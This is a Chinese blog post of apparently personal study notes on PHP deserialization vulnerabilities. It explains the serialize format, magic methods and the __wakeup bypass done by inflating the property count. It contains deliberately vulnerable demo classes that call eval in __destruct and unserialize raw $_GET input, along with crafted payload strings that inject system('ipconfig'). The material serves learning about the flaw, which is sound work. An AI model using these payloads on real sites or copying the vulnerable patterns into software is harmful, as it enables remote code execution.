★PHP反序列化漏洞

已于 2022-04-04 21:54:10 修改
阅读量519 收藏 1
点赞数
分类专栏: Web安全 文章标签: 网络 web安全 安全
于 2022-04-04 20:36:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/123959932
版权
1.普通的序列化和相应的反序列化代码操作
2.反序列化漏洞利用1 参数个数错误从而wakeup函数不会被调用  一般防火墙都在wakeup函数这里 这样也就实现了绕过
改变量的个数 会跳过wakeup 但是仍然会执行
但是改变量长度和值的长度 wakeup也不会执行 但是对象已经不正常了
当反序列化变量的个数不对,那么__wakeup就不会执行 直接执行了__destruct
所以可以夹带私货
但是切记 一旦修改变量数量绕过了wakeup函数  后续也没有办法再用反序列化的结果去调用自身的函数 已经存在问题了 
一般网站牵扯到大型数据的传输  有时候就可以通过post或者get直接执行恶意语句
举例:防火墙
如果页面可以执行php的东西 或者存在写入文件的情况的话  那么私货就可以被成功执行了
3.反序列化漏洞利用2 INF的比较问题 
//序列化和反序列化漏洞复现
var_dump('INF'==INF);//false
var_dump('INF'!==INF);//true
var_dump(md5('INF')===md5(INF));//true

echo '<br/>';
echo md5('INF');
echo '<br/>';
echo md5(INF);
4.当不仅仅是public时,还有private和protected的情况时如何写序列化的结果
在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。
序列化serialize()
序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象:
            <pre>
    class S{
        public $test="pikachu";
    }
    $s=new S(); //创建一个对象
    serialize($s); //把这个对象进行序列化
    序列化后得到的结果是这个样子的:O:1:"S":1:{s:4:"test";s:7:"pikachu";}
        O:代表object
        1:代表对象名字长度为一个字符
        S:对象的名称
        1:代表对象里面有一个变量
        s:数据类型
        4:变量名称的长度
        test:变量名称
        s:数据类型
        7:变量值的长度
        pikachu:变量值
<b>反序列化unserialize()</b><br />
 <p>就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。</p>
<pre>
    $u=unserialize("O:1:"S":1:{s:4:"test";s:7:"pikachu";}");
    echo $u->test; //得到的结果为pikachu
    </pre>
            <p>序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题</p>
            <pre>
        常见的几个魔法函数:  前面是两个下划线
        __construct()当一个 对象创建 时被调用   构造函数
        __destruct()当一个 对象销毁 时被调用    析构函数  (后进先出  后被创建的先析构)
        __toString()当一个对象被当作一个字符串使用
        __sleep() 在对象在 被序列化之前 运行
                PS:serialize()函数在执行前会检查是否有__sleep函数 如果有就会先执行这个函数
这个函数会返回一个包含对象中所有应该被序列化的变量名称的数组
如果该方法未返回任何内容 则NULL会被序列化 所以会出现序列化结果是N;
        __wakeup将在 序列化之后 立即被调用    (unserialize先执行 wakeup后执行) 
<?php
class people{
    //类变量
    public $name;
    public $age;

    //构造函数,new类时候自动调用
    function __construct(){
        echo '构造函数被调用了<br/>';
    }


    //析构函数,事情做完之后调用
    function __destruct(){
        echo '析构函数调用<br/>';
    }


    //反序列化之后立马调用的函数
    function __wakeup(){
        echo '有东西被反序列化啦<br/>';
    }

    //类函数
    function shuohua(){
        echo 'wo jiao '.$this->name." jin nian ".$this->age." sui<br/>";
    }
}
//初始化类
$ren1 = new people();
//给类变量赋值
$ren1->name="xiaoming";
$ren1->age = 20;
//使用类方法
$ren1->shuohua();

//把ren1进行序列化
$xuliehua_ren1 = serialize($ren1);
//O:6:"people":2:{s:4:"name";s:8:"xiaoming";s:3:"age";i:20;}
echo $xuliehua_ren1.'<br/>';
//反序列化
$str1 = 'O:6:"people":2:{s:4:"name";s:8:"xiaoming";s:3:"age";i:20;}';
$copy_ren1 = unserialize($str1);

$copy_ren1->shuohua();

?>
//当传入的需要反序列化的字符串,有多少个参数的位置,发生错误,wakeup不会启动
$str1 = 'O:6:"people":3:{s:4:"name";s:8:"xiaoming";s:3:"age";i:20;s:3:"job";s:6:"driver";}';
$copy_ren1 = unserialize($str1);
$copy_ren1->shuohua();
<?php
//序列化和反序列化
class people{
    //变量
    public $name;
    protected $age = 20;
    private $job = "driver";
    //构造函数,new的时候自动调用
    function __construct(){
        echo '构造函数启动<br/>';
    }
    //析构函数,事情做完了之后调用
    function __destruct(){
        echo '析构函数调用<br/>';
        echo '没问题,保存进度<br/>';
    }
    //反序列化自动调用
    function __wakeup(){
        echo '反序列化启动<br/>';
        echo '防火墙启动,不要乱来<br/>';
    }
    //类函数
    function shuohua(){
        echo 'wo jiao '.$this->name.' nian ling '.$this->age.' sui job is '.$this->job.'<br/>';
    }
}
//初始化
/*
$ren1 = new people();
$ren1->name = "xiaoming";
$ren1->shuohua();
*/
//序列化
//O:6:"people":3:{s:4:"name";s:8:"xiaoming";s:3:"age";i:20;s:3:"job";s:6:"driver";}
//O:6:"people":3:{s:4:"name";s:8:"xiaoming";s:6:"*age";i:20;s:11:"peoplejob";s:6:"driver";}
/*
protected属性序列化之后
%00*%00名字
private属性序列化之后
%00类名%00名字
*/
/*
$code = serialize($ren1);
echo $code.'<br/>';
*/
/**/
//当传入的需要反序列化的字符串,有多少个参数的位置,发生错误,wakeup不会启动
//$str1 = 'O:6:"people":3:{s:4:"name";s:8:"xiaoming";s:6:"%00*%00age";i:20;s:11:"%00people%00job";s:6:"driver";}';
///s.php?str1=O:6:"people":3:{s:4:"name";s:8:"xiaoming";s:6:"%00*%00age";i:20;s:11:"%00people%00job";s:6:"driver";}
$copy_ren1 = unserialize($_GET['str1']);
$copy_ren1->shuohua();
?>
代码分析学习: 
<?php

class people{
	public $name;
	public $age;
	public $location;

	function __construct(){
		echo 'people类的对象被创建了!<br/>';
	}

	function __destruct(){
		echo 'people类的对象被kill了<br/>';
		eval($this->location);
	}

	function __wakeup(){
		echo '有字符串刚刚被反序列化了</br>';
		die('stop hacking!');
	}

}

$ren=new people();
$ren->name="xiaohong";
$ren->age=18;
$ren->location="jiangsu";
$results = serialize($ren);
echo $results;   //O:6:"people":3:{s:4:"name";s:8:"xiaohong";s:3:"age";i:18;s:8:"location";s:7:"jiangsu";}
echo '<br>';

$result2='O:6:"people":3:{s:4:"name";s:8:"xiaohong";s:3:"age";i:18;s:8:"location";s:19:"system("ipconfig");";}';
$hehe=unserialize($result2);



?>

其他情况代码学习:

<?php

class people{
	public $name="xiaohong";
	private $age=18;
	protected $location="jiangsu";

	function __construct(){
		echo 'people类的对象被创建了!<br/>';
	}

	function __destruct(){
		echo 'people类的对象被kill了<br/>';
		eval($this->name);
	}

	function __wakeup(){
		echo '有字符串刚刚被反序列化了</br>';
		die('stop hacking!');
	}

}

$ren=new people();
$results = serialize($ren);
echo $results;   //O:6:"people":3:{s:4:"name";s:8:"xiaohong";s:11:"peopleage";i:18;s:11:"*location";s:7:"jiangsu";}
echo '<br>';

$result2='O:6:"people":4:{s:4:"name";s:19:"system("ipconfig");";s:11:"peopleage";i:18;s:11:"*location";s:7:"jiangsu";}';
$hehe=unserialize($result2);



?>

Simon_Smith
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web安全--反序列化漏洞详解(php篇)
bobo_milk的博客
11-29 1121
反序列化
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
php反序列化漏洞
Shanfenglan's blog
04-08 386
文章目录成因phpjava漏洞复现参考文章 成因 传给反序列化函数的参数用户可控。 php 测试代码 <?php class sfl{ var $test= '123'; var $aa = 'z'; var $q; } $class1 = new sfl; $arr=array('tom','cody','ffffff'); $class1_ser = serialize($class1); print_r('class======>'.$class1_ser.'<br>')
php反序列化漏洞扫描,浅析php反序列化漏洞
weixin_39631667的博客
03-28 257
反序列化在很多语言中都比较常见,下面简单介绍php反序列化漏洞(对象注入)。0x00.是什么——whatphp反序列化漏洞,又叫对象注入。涉及到的是php中的两个函数:unsearialize()与serialize()。后者为将一个对象或者数组转换为字符串以便保存,前者则将尝试将字符串恢复为对象或者数组。关于这个漏洞大家平时可能很少见,它的触发点主要是在代码审计中cms的session序列化与...
php 反序列化漏洞,PHP反序列化漏洞详解
weixin_35052140的博客
03-11 413
最近和小伙伴们一起研究了下PHP反序列化漏洞,突发奇想,利用反序列化漏洞写一个一句话木马效果应该蛮不错的。本文主要和大家分享PHP反序列化漏洞详解,希望能帮助到大家。0x01 PHP反序说起PHP反序列化,那必须先简单说一下PHP的序列化。PHP序列化是将一个对象、数组、字符串等转化为字节流便于传输,比如跨脚本等。而PHP反序列化是将序列化之后的字节流还原成对象、字符、数组等。但是PHP序列化是不...
php反序列化漏洞条件,PHP反序列化漏洞总结
weixin_32104797的博客
03-19 271
写在前边做了不少PHP反序列化的题了,是时候把坑给填上了。参考了一些大佬们的博客,自己再做一下总结1.面向对象2.PHP序列化和反序列化3.PHP反序列化漏洞实例1.面向对象在了解序列化和反序列化之前,先简单了解一下PHP的面向对象。万物皆可对象。根据官方手册,PHP中,以关键字class定义一个类,一个类可以包含有属于自己的常量,变量(称为“属性”)以及函数(称为“方法”)。classPeopl...
深入浅析PHP的session反序列化漏洞问题
10-19
主要介绍了PHP的session反序列化漏洞问题,需要的朋友可以参考下
PHP反序列化漏洞.pdf
08-10
**PHP反序列化漏洞详解** PHP反序列化漏洞是一种常见的安全漏洞,主要出现在PHP应用程序中,当程序在处理用户可控的序列化数据时,没有进行有效的验证和过滤,导致攻击者能够操纵序列化的数据,从而执行任意代码...
PHP反序列化漏洞研究
06-17
PHP反序列化漏洞研究 PHP反序列化漏洞是指攻击者可以通过构造恶意的序列化数据来执行恶意代码或泄露敏感信息的漏洞。这种漏洞通常发生在使用PHP的serialize()和unserialize()函数时。 在PHP中,serialize()函数...
PHP反序列化漏洞详解(万字分析、由浅入深)
热门推荐
Hardworking666的博客
01-08 1万+
文章目录一、PHP面向对象编程二、PHP序列化和反序列化三、PHP反序列化漏洞原理 一、PHP面向对象编程 在面向对象的程序设计(Object-oriented programming,OOP)中,对象是一个由信息及对信息进行处理的描述所组成的整体,是对现实世界的抽象。 类是一个共享相同结构和行为的对象的集合。每个类的定义都以关键字class开头,后面跟着类的名字。 创建一个PHP类: <?php class TestClass //定义一个类 { //一个变量 public $variable ..
(日更)PHP反序化漏洞解析(2) PHP序列化/反序列化过程
AAAAAAAAAAAA66的博客
11-26 692
上文中我们简单介绍了下PHP序列化,及为什么要序列化。 弄清楚前面2个知识点后,理解这个过程会更容易。 *****PHP语言中常用的序列化和反序列化函数有serialize,unserialize,json_encode和json_decode. *****这里介绍serialize,unserialize函数。 serialize函数 当序列化对象时,PHP在序列化动作之前调用魔法函数 __sleep,这样就允许对象在被序列化之前做任何清楚操作。 魔法函数:在php的语法中,有一些系统自带的方
PHP反序列化漏洞总结
u013797594的博客
06-11 2467
PHP反序列化漏洞总结
php反序列化总结
weixin_44576725的博客
04-08 6548
php反序列化总结 基础知识 序列化 序列化就是将 对象object、字符串string、数组array、变量 转换成具有一定格式的字符串,方便保持稳定的格式在文件中传输,以便还原为原来的内容。 serialize ( mixed $value ) : string serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。 example: class Test { public $name = "s1ng"; private $age = 19;
PHP反序列化-BUUCTF-[极客大挑战 2019]PHP&__wakeup绕过
cike_y
11-27 720
题目链接地址:https://buuoj.cn/challenges#[极客大挑战%202019]PHP
PHP反序列化-__wakeup()方法漏洞(CVE-2016-7124)
bin789456的博客
08-13 3583
写在前面 wakeup()是在反序列化的基础之上进行的,如果你不是很清楚反序列化漏洞,可以点击下方: [超链接] 漏洞影响的版本 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 漏洞出现情况 1.可以之间或简介控制序列化结果 2.__wakeup(
Mac虚拟机跑Windows流畅吗 Mac虚拟机连不上网络怎么解决 mac虚拟机网速慢怎么解决
2401_82916694的博客
07-10 652
选择Shared模式,你的Mac会当作虚拟机的路由器。一般来说,拥有更高性能的Cpu(如Apple M2或M3芯片)、更大的内存(建议16GB以上)、以及足够的存储空间可以显著提升虚拟机中Windows的运行流畅度。Mac的防火墙或其他安全设置可能阻止虚拟机访问网络,如果你的Mac主机可以访问网络,并且排查了上文介绍的情况,那么可以尝试关闭Mac电脑防火墙,再检查虚拟机是否可以连接网络。使用Mac虚拟机运行Windows是否流畅,取决于几个关键因素:硬件配置、虚拟机软件的选择以及虚拟机的设置。
YOLOv10改进 | 特殊场景检测篇 | 轻量级的低照度图像增强网络IAT改进YOLOv10暗光检测(全网独家首发)
最新发布
Snu77的博客
07-11 1万+
本文给大家带来的改进机制是轻量级的变换器模型:Illumination Adaptive Transformer (IAT),用于图像增强和曝光校正。其基本原理是通过分解图像信号处理器(ISP)管道到局部和全局图像组件,从而恢复在低光或过/欠曝光条件下的正常光照sRGB图像。具体来说,IAT使用注意力查询来表示和调整ISP相关参数,例如颜色校正、伽马校正。模型具有约90k参数和约0.004s的处理速度,能够在低光增强和曝光校正的基准数据集上持续实现优于最新技术(State-of-The-Art, SOTA)
从零开始做题:logtime
weixin_44626085的博客
07-10 247
给出1个pcapng文件。
php反序列化漏洞习题
09-06
关于PHP反序列化漏洞的习题,可以使用GlobIterator类和ArrayObject类来进行练习。其中,GlobIterator类的题目是被遗忘的反序列化,ArrayObject类的题目是easy_phpPHP反序列化漏洞是一种安全漏洞,其中一个具体的例子是CVE-2016-7124,该漏洞存在于php5<5.6.25和php7<7.0.10的版本中。漏洞的产生原因是由于反序列化时对输入的不当处理所导致的。 了解PHP反序列化漏洞的习题,需要掌握类与对象、反序列化基础知识以及一些与魔术方法相关的内容,如构造和折构方法(__construct()、__destruct())、序列化和反序列化方法(__sleep()、__wakeup())、错误调用魔术方法(__callStatic()、__get()、__set()、__isset()、__unset()、__clone())等。反序列化漏洞的成因较复杂,例如POP链构造、POC链反推法等。 此外,还可以学习字符串逃逸和__wakeup魔术方法绕过漏洞的相关知识。其中,__wakeup魔术方法绕过漏洞的产生原因是__wakeup方法可以在反序列化时被绕过,从而可能导致安全漏洞PHP反序列化漏洞还可以通过引用的利用方法来进行学习。另外,还可以学习SESSION反序列化漏洞和phar反序列化漏洞的习题。其中,SESSION反序列化漏洞涉及到不同处理器的不同储存格式,而phar反序列化漏洞需要了解phar的构造和使用条件。 通过这些习题的学习,可以更好地理解PHP反序列化漏洞以及如何进行防范和修复。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [PHP反序列化漏洞(最全面最详细有例题)](https://blog.csdn.net/m0_73728268/article/details/129893800)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值